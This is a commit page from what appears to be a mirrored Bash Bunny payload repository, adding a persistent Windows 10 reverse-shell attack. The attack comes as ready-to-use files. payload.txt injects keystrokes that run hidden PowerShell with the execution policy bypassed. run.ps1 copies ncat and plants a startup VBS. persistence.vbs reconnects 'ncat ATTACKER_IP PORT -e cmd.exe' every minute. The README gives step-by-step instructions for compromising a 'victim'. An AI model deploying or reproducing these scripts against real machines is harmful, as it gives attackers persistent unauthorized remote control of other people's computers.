hak5/bashbunny-payloads
1
0
Fork 0
mirror of https://github.com/hak5/bashbunny-payloads.git synced 2025-10-29 16:58:25 +00:00
Code Issues Packages Projects Releases Wiki Activity

Persistent Reverse Shells for MacOS and Windows 10 (#306)

Browse Source
This commit is contained in:
KeenanV
2018-01-21 15:39:14 -08:00
committed by Sebastian Kinne
parent a998f5c86c
commit 7f902403d4
6 changed files with 166 additions and 0 deletions
Download Patch File Download Diff File Expand all files Collapse all files

45
payloads/library/remote_access/WindowsPersistentReverseShell/README.md Normal file
View File

@@ -0,0 +1,45 @@
# Windows Persistent Reverse Shell for Bash Bunny
* Author: 0dyss3us (KeenanV)
* Version: 1.1
## Description
Opens a persistent reverse shell through NetCat on victim's Windows machine and connects it back to host attacker.
* Targets Windows 10 (working on support for older versions)
* Connection can be closed and reconnected at any time
* Deploys in roughly 15-20 sec
* Works with NetCat
## Requirements
Have a working Bash Bunny :)
## STATUS
| LED | STATUS |
| -------------------- | ------------------------------ |
| Purple | Setup |
| Amber (Single Blink) | Installing and running scripts |
| Green | Finished |
## Installation and Execution
1. Plug in Bash Bunny in arming mode
2. Move files from WindowsPersistentReverseShell to either switch folder
3. Download ncat from http://nmap.org/dist/ncat-portable-5.59BETA1.zip and place the downloaded ncat.exe file in the same switch folder.
4. Edit the persistence.vbs file and replace `ATTACKER_IP` with attacker's IP and `PORT` with whichever port you like to use (I use 1337 :wink:)
5. Edit the run.ps1 file and replace `BashBunny` with the volume name of your Bash Bunny
6. Save the persistence.vbs file
7. Unplug Bash Bunny and switch it to the position the payload is loaded on
8. Plug the Bash Bunny into your victim's Windows machine and wait until the final light turns green (about 15-20 sec)
9. Unplug the Bash Bunny and go to attacker's machine
10. Listen on the port you chose in the persistence.vbs file on NetCat
* Run the command `nc -nlvp 1337` (replace the port with the port in persistence.vbs)
* If using Windows as the attacker machine, you must move the same ncat.exe file downloaded in step 3 to any directory and use the command `ncat` instead of `nc` from that directory.
11. Wait for connection (Should take no longer than 1 minute as the powershell command runs every minute)
12. Once a Windows cmd prompt appears...YOU'RE DONE!! :smiley: and you can disconnect and reconnect at any time as long as the user is logged in
## Discussion
[Click here](https://forums.hak5.org/topic/42729-payload-windows-persistent-reverse-shell/) for forum discussion

18
payloads/library/remote_access/WindowsPersistentReverseShell/payload.txt Normal file
View File

@@ -0,0 +1,18 @@
# Title: NetCat Reverse Shell Windows
# Description: Creates a persistent reverse shell on Windows and connects back to attacker through NetCat
# Author: 0dyss3us (KeenanV)
# Props:
# Version: 1.0
# Category: Remote Access
# Target: Windows 10
# Attackmodes: HID, Storage
#Sets attack mode and stores current switch position
LED SETUP
ATTACKMODE HID STORAGE
GET SWITCH_POSITION
#Runs Powershell script which puts a .vbs file in the startup folder and runs it
LED ATTACK
RUN WIN Powershell -nop -ex Bypass -w Hidden ".((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\\$SWITCH_POSITION\run.ps1')"
LED FINISH

7
payloads/library/remote_access/WindowsPersistentReverseShell/persistence.vbs Normal file
View File

@@ -0,0 +1,7 @@
Dim ncShell
Set ncShell = WScript.CreateObject("WScript.shell")
Do while True:
ncShell.Run "powershell.exe C:\temp\ncat.exe ATTACKER_IP PORT -e cmd.exe", 0, true
WScript.Sleep(60000)
loop

20
payloads/library/remote_access/WindowsPersistentReverseShell/run.ps1 Normal file
View File

@@ -0,0 +1,20 @@
$Drive = (Get-WMIObject Win32_Volume | ? { $_.Label -eq 'BashBunny' }).name
$user = $env:UserName
$NetCatFile = $Drive + "payloads\switch1\ncat.exe"
$PersistenceFile = $Drive + "payloads\switch1\persistence.vbs"
$DestinationFile1 = "C:\temp\ncat.exe"
$DestinationFile2 = ("C:\Users\" + $user + "\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\persistence.vbs")
If ((Test-Path $DestinationFile1) -eq $false){
New-Item -ItemType File -Path $DestinationFile1 -Force
}
If ((Test-Path $DestinationFile2) -eq $false){
New-Item -ItemType File -Path $DestinationFile2 -Force
}
Copy-Item -Path $NetCatFile -Destination $DestinationFile1
Copy-Item -Path $PersistenceFile -Destination $DestinationFile2
Set-Location -Path ("C:\Users\" + $user + "\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup")
Start-Process cmd -ArgumentList "/c start persistence.vbs"